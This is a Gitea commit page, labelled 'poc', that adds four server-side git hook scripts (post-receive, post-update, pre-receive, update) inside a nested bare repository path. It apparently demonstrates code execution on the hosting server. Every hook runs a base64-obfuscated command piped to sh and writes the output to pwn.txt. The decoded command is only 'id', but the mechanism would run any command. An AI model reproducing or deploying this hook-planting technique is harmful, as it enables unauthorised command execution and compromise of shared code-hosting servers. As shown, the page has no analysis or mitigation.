This website works better with JavaScript
Trang chủ
Khám phá
Trợ giúp
Đăng ký
Đăng nhập
pwn3011
/
w96f1
Xem
1
Star
0
Fork
0
Các tập tin
Các vấn đề
0
Yêu cầu kéo về
0
Wiki
Browse Source
poc
x
1 tháng trước cách đây
mục cha
57d71764a8
commit
0c00f5fa7d
4 tập tin đã thay đổi
với
8 bổ sung
và
0 xóa
Split View
Hiển thị tình trạng sai khác
2
0
n/r34fd.git/hooks/post-receive
2
0
n/r34fd.git/hooks/post-update
2
0
n/r34fd.git/hooks/pre-receive
2
0
n/r34fd.git/hooks/update
+ 2
- 0
n/r34fd.git/hooks/post-receive
Xem Tập Tin
@@ -0,0 +1,2 @@
+#!/bin/sh
+echo '$(echo 'aWQ=' | base64 -d | sh)' > pwn.txt
+ 2
- 0
n/r34fd.git/hooks/post-update
Xem Tập Tin
@@ -0,0 +1,2 @@
+#!/bin/sh
+echo '$(echo 'aWQ=' | base64 -d | sh)' > pwn.txt
+ 2
- 0
n/r34fd.git/hooks/pre-receive
Xem Tập Tin
@@ -0,0 +1,2 @@
+#!/bin/sh
+echo '$(echo 'aWQ=' | base64 -d | sh)' > pwn.txt
+ 2
- 0
n/r34fd.git/hooks/update
Xem Tập Tin
@@ -0,0 +1,2 @@
+#!/bin/sh
+echo '$(echo 'aWQ=' | base64 -d | sh)' > pwn.txt